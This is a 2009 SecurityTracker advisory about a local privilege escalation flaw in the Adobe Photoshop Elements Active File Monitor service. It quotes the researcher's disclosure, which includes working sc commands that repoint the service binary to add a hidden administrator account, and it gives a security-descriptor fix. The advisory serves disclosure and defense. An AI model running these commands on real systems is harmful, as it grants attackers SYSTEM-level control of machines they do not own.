Adobe Photoshop Elements Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID: 1022963|
SecurityTracker URL: http://securitytracker.com/id/1022963
(Links to External Site)
Updated: Nov 11 2009|
Original Entry Date: Sep 30 2009
Execution of arbitrary code via local system, Root access via local system|
Vendor Confirmed: Yes Exploit Included: Yes |
Version(s): Elements 7.0, 8.0|
A vulnerability was reported in Adobe Photoshop Elements. A local user can obtain elevated privileges on the target system.|
The Adobe Active File Monitor service is installed with an unsafe security descriptor. A local user in the 'Users' group can stop the service, invoke the 'sc config' command to replace the path with an arbitrary path, and then restart the service to execute arbitrary code with System privileges.
The original advisory is available at:
Nine:Situations:Group::bellick reported this vulnerability.
A local user can obtain System privileges on the target system.|
No solution was available at the time of this entry.|
The vendor has described a workaround in their advisory.
The vendor's advisory is available at:
Vendor URL: www.adobe.com/support/security/bulletins/apsb09-17.html (Links to External Site)
Source Message Contents
Date: Tue, 29 Sep 2009 10:38:22 -0600|
Subject: Adobe Photoshop Elements 8.0 Active File Monitor Service Bad
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
Tested on Microsoft Windows XP SP3
The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd
now login as administrator with password "kills"
the security descriptor of the service is like this:
C:\>sc sdshow "AdobeActiveFileMonitor8.0"
note the WO and WD permission for Everyone (!!!!!)
change the security descriptor like the following:
c:\sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS
readings, interesting article:
original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html